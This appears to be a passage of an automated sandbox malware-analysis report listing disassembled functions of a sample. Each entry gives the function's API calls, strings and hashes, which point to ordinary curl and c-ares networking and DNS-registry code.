Instruction Fuzzy Hash: 6ED1B0716083499FEB10DFA4C981B7BB7E5FF94348F04482DFA8586242E7B4E944DB92

Function 00AF6FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64a0189234a08bdad02be9bbaa4830bf677effd6bf377ddc0dbef54bb2c16b7
Instruction ID: d467d18de6b64e61f26120cbc1d8436b4e6e4d9017d6518a6dd1d4ebd9118279
Opcode Fuzzy Hash: a64a0189234a08bdad02be9bbaa4830bf677effd6bf377ddc0dbef54bb2c16b7
Instruction Fuzzy Hash: BF91EE3060D31D4BD7358BA888847BEB2E9AFC4364F148B2CFAA9471E4EB709C40D681

Function 00BAB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00BAB2B6

Strings

cur != NULL, xrefs: 00BAB3F2
ares__sortaddrinfo.c, xrefs: 00BAB3ED

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: b5ce74283c143128b87b83cc1b8550a71fc5bf69dc9cabc2ffe43bf3b2a7079c
Instruction ID: a5f730d6ce3b7214419dc7d7a39a0ff1e05d9a11dce7d518b450d955ad516cb7
Opcode Fuzzy Hash: b5ce74283c143128b87b83cc1b8550a71fc5bf69dc9cabc2ffe43bf3b2a7079c
Instruction Fuzzy Hash: 60C171716083059FDB18DF24C891E6A77E1FF9A314F0489ADE8658B3A2DB34ED45CB81

Function 00BAA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00B9712E,?,?,?,00001001,00000000), ref: 00BAA90D

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 95e3e4b613e7bb1f915cb4d216242a1809666fd4d5012110a5209d20580106c0
Instruction ID: 51c0ef0ce63446a354522c083b4a020905e92b166bcc5d3939fd4f469d73a2f7
Opcode Fuzzy Hash: 95e3e4b613e7bb1f915cb4d216242a1809666fd4d5012110a5209d20580106c0
Instruction Fuzzy Hash: F8F01D75118348BFD2109E41DC88D6BBBEDEFCA754F05496DF958232119371AE10CAB2

Function 00B9A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B9AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B9AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00B9AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B9AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B9AB30
RegCloseKey.KERNELBASE(?), ref: 00B9AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00B9AB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00B9AC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00B9AD0A
RegEnumKeyExA.KERNELBASE ref: 00B9AD8D
RegCloseKey.KERNELBASE(?), ref: 00B9ADD9
RegEnumKeyExA.KERNELBASE ref: 00B9AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00B9AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B9AE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B9AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B9AFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00B9B072

Strings

System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00B9AA0F
SearchList, xrefs: 00B9AA46, 00B9AA91, 00B9ABA7, 00B9ABEA, 00B9AE4E, 00B9AE9D
DhcpDomain, xrefs: 00B9B06C, 00B9B0BB
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00B9AD00
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00B9AB78
Domain, xrefs: 00B9AAE3, 00B9AB2A, 00B9AF5D, 00B9AFAC
PrimaryDNSSuffix, xrefs: 00B9AC6B, 00B9ACAE
Software\Policies\Microsoft\System\DNSClient, xrefs: 00B9AC3C

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: QueryValue$Open$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4217438148-1047472027
Opcode ID: 8111281e906fc99aa45b419a67d73f3ce29c9ff64775a9c3719641494386615f
Instruction ID: 46abffa6f909de19f9e3bd3620b2ffe906fc42743be8722d9e00e0d840e522d4
Opcode Fuzzy Hash: 8111281e906fc99aa45b419a67d73f3ce29c9ff64775a9c3719641494386615f
Instruction Fuzzy Hash: 7772AFB1608341ABEB20DB24DC85B6B77E8EF95700F144868F985DB291EB71E944CB93

Function 00B1A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00B1A832

Strings

Couldn't bind to '%s' with errno %d: %s, xrefs: 00B1AE1F
@, xrefs: 00B1A8F4
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00B1A6CE
Trying [%s]:%d..., xrefs: 00B1A689
cf-socket.c, xrefs: 00B1A5CD, 00B1A735
Local port: %hu, xrefs: 00B1AF28
Trying %s:%d..., xrefs: 00B1A7C2, 00B1A7DE
Bind to local port %d failed, trying next, xrefs: 00B1AFE5
Name '%s' family %i resolved to '%s' family %i, xrefs: 00B1ADAC
@, xrefs: 00B1AC42
Could not set TCP_NODELAY: %s, xrefs: 00B1A871
bind failed with errno %d: %s, xrefs: 00B1B080
cf_socket_open() -> %d, fd=%d, xrefs: 00B1A796
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00B1AD0A
Local Interface %s is ip %s using address family %i, xrefs: 00B1AE60

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: d20bd0aac288c865741ca29e0e07feb1552d18db961b3dd9c9e4c9d1862d2689
Instruction ID: d6f3a3e5af67814304d27b1b76f773ed362d5dbcfe6d468d1abcef14fa6f7ccf
Opcode Fuzzy Hash: d20bd0aac288c865741ca29e0e07feb1552d18db961b3dd9c9e4c9d1862d2689
Instruction Fuzzy Hash: 12621571509341ABE721CF14C886BEBB7E5FF80304F4449A9F98897282E771E985CB93

Function 00BA9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00BA9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00BA9974
RegCloseKey.KERNELBASE(?), ref: 00BA998B

Strings

sts, xrefs: 00BA99A2
#, xrefs: 00BA9A3F
#, xrefs: 00BA9B9D
\hos, xrefs: 00BA999A
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00BA993C
DatabasePath, xrefs: 00BA996B
CARES_HOSTS, xrefs: 00BA9788

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3677997916-4129964100
Opcode ID: db7151aa6307f17e000a25cad781e95daf341367b32c162bc6a30581f9b1e76e
Instruction ID: 2ec1f23b401e1f84313c90f9b9a59af4d871ad16d4311342d57905b42b648a0a
Opcode Fuzzy Hash: db7151aa6307f17e000a25cad781e95daf341367b32c162bc6a30581f9b1e76e
Instruction Fuzzy Hash: C132C5B5908201AFEB11EB24EC82A1B76D5EF56314F0848B8FD599A223FB31ED14D753

Function 00B18B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00B18C30
SleepEx.KERNELBASE(00000000,00000000), ref: 00B18CF3

Strings

cf-socket.c, xrefs: 00B18EDF
not connected yet, xrefs: 00B18BDC
local address %s port %d..., xrefs: 00B18C7F
connected, xrefs: 00B18DA7
connect to %s port %u from %s port %d failed: %s, xrefs: 00B18E78

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: Sleepconnect
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 238548546-879669977
Opcode ID: 1398665951cccacf69844837912cc5fc4a83ca42556ccbe65fb20ef604f39cfd
Instruction ID: 332d3414b19cdda49c127204b8bde5231b17bb42c0eeb42c9ae7fe2e6cc7c5a6
Opcode Fuzzy Hash: 1398665951cccacf69844837912cc5fc4a83ca42556ccbe65fb20ef604f39cfd
Instruction Fuzzy Hash: 95B1AE70608306AFDB10CF24D985BA7B7E1FF45318F5489BCE8598B292DB71E894C7A1

Function 00AE2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00AE2FED
RegEnumKeyExA.KERNELBASE ref: 00AE31A5

Strings

d, xrefs: 00AE2FA0

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: EnumOpen
String ID: d
API String ID: 3231578192-2564639436
Opcode ID: 0279c59bc23ebe687c5141448c3bc2d26ba7bb059323a7d503b37114a9285b05
Instruction ID: 5a253ef10c82375e01a0c0eadd5aebec456a6fad639fd4a9ff74b34acae30416
Opcode Fuzzy Hash: 0279c59bc23ebe687c5141448c3bc2d26ba7bb059323a7d503b37114a9285b05
Instruction Fuzzy Hash: B97192B49043199FDB50DF69D98879EBBF0BF84348F10895DE89897301E7749A888F92

Function 00B19290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00B1935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00B19388

Strings

cf-socket.c, xrefs: 00B192CF
Send failure: %s, xrefs: 00B193FB
send(len=%zu) -> %d, err=%d, xrefs: 00B19447

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: d26e13960625df1a27a11a715d72c0b47a85c290033bb2400a86a0d0e7461fcf
Instruction ID: 679587a61904d151c59867c270a3b540bd41d32308a85487ea07ad9383673fc1
Opcode Fuzzy Hash: d26e13960625df1a27a11a715d72c0b47a85c290033bb2400a86a0d0e7461fcf
Instruction Fuzzy Hash: 1F510F30600345ABEB15DF24C891FAAB7E5FF89314F548568FD588B382E730E991CB91

Function 00AE76A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,00AE3D4E,00000000,?,?,00AF07BF), ref: 00AE76EA

Strings

SEND %s:%d send(%lu) = %ld, xrefs: 00AE76F8
LIMIT %s:%d %s reached memlimit, xrefs: 00AE7712, 00AE7731
send, xrefs: 00AE770B, 00AE772A
multi.c, xrefs: 00AE76DD, 00AE76E9

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
